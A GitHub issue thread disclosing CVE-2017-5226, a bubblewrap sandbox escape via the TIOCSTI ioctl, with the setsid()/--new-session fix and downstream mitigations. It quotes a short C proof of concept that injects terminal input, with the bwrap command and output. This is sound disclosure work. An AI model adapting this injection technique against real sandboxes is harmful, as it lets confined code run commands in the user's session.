Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2017-5226 -- bubblewrap escape via TIOCSTI ioctl #142

Closed
smcv opened this issue Jan 9, 2017 · 5 comments
Closed

CVE-2017-5226 -- bubblewrap escape via TIOCSTI ioctl #142

smcv opened this issue Jan 9, 2017 · 5 comments

Comments

@smcv
Copy link
Collaborator

smcv commented Jan 9, 2017

On Debian bug https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702, Federico Bento <up201407890@alunos.dcc.fc.up.pt> writes:

When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.

This has been assigned CVE-2017-5226.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin
--ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test
id
uid=0 gid=1000 groups=1000
$ id  <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)

I don't know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.
smcv added a commit to smcv/bubblewrap that referenced this issue Jan 9, 2017
@smcv
Call setsid() before executing sandboxed code (CVE-2017-5226)
3f2f885 
This prevents the sandboxed code from getting a controlling tty,
which in turn prevents it from accessing the TIOCSTI ioctl and hence
faking terminal input.

Fixes: containers#142
@smcv
Copy link
Collaborator Author

smcv commented Jan 9, 2017

Calling setsid() appears to be sufficient to avoid this, if we are willing to sacrifice tty job control for the sandboxed processes. With a slightly modified exploit that calls perror() if the ioctl fails:

ioctl TIOCSTI: Operation not permitted
ioctl TIOCSTI: Operation not permitted
ioctl TIOCSTI: Operation not permitted

I'm going to apply that in Debian for now.

@smcv smcv mentioned this issue Jan 9, 2017
Closed
@smcv
Copy link
Collaborator Author

smcv commented Jan 9, 2017

This is arguably not a vulnerability in Bubblewrap itself, because it does not give the user calling Bubblewrap any more privileges outside the sandbox than they had inside.

However, I think it is correct to treat it as a vulnerability in Flatpak, and in any other sandboxes based on Bubblewrap that might be invoked with a controlling terminal.

@smcv
Copy link
Collaborator Author

smcv commented Jan 9, 2017

I should note here for completeness that at least one member of the Debian security team seems to think this and its clones (CVE-2005-4890, CVE-2016-7545, CVE-2016-2781, CVE-2016-2779, CVE-2016-2568) are really all examples of one kernel issue, namely "TIOCSTI should be a privileged operation". https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702#27

@alexlarsson alexlarsson mentioned this issue Jan 16, 2017
Open
@wland32 wland32 mentioned this issue Mar 25, 2019
Closed
ebkalderon added a commit to ebkalderon/bastille that referenced this issue Nov 25, 2019
@ebkalderon
Describe mitigation to CVE-2017-5226 with setsid()
a88f56f 
Note that we do not call `setsid()` just yet because it messes with job
control in some applications, so we leave it disabled for now. Ideally,
we would use an alternative approach, likely with `seccomp`, to achieve
this. For more details, see:

* Discussion: containers/bubblewrap#142
* Flatpak's solution: flatpak/flatpak@902fb71
@pxeger
Copy link

pxeger commented Mar 15, 2021

Am I right that this is not an issue when bwrap is not attached to a TTY (e.g. run in a script as a systemd service)?

@smcv
Copy link
Collaborator Author

smcv commented Mar 16, 2021

Am I right that this is not an issue when bwrap is not attached to a TTY (e.g. run in a script as a systemd service)?

I think that's correct. However, you don't need to trust me on this - you can try the sample exploit in your environment, and find out.

@e00E e00E mentioned this issue Nov 5, 2022
Open
@hartwork hartwork mentioned this issue Feb 28, 2023
Open
kaniini added a commit to chainguard-dev/melange that referenced this issue Mar 14, 2023
@kaniini
container: bubblewrap runner: use --new-session to mitigate CVE-2017-…
07cd62e 
…5226

Without it, it is possible to escape the sandbox via TIOCSTI ioctls on the session
PTY.

Related: containers/bubblewrap#555
Related: containers/bubblewrap#142
Related: https://news.ycombinator.com/item?id=30825088
Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
@kaniini kaniini mentioned this issue Mar 14, 2023
Merged
@hartwork hartwork mentioned this issue Mar 15, 2023
Open
algitbot pushed a commit to alpinelinux/abuild that referenced this issue Mar 16, 2023
@kaniini
abuild: bwrap: use --new-session to mitigate TIOCSTI escape (CVE-2017…
d54d8f5 
…-5226)

Bubblewrap has an under-documented option which helps to protect against abuse
of TIOCSTI ioctls against the session PTY to escape the build sandbox, the
--new-session option.

Related: containers/bubblewrap#555
Related: containers/bubblewrap#142
Related: https://news.ycombinator.com/item?id=30825088
Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
@hartwork hartwork mentioned this issue Apr 29, 2023
Open
@jamielinux jamielinux mentioned this issue Feb 26, 2024
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@smcv @pxeger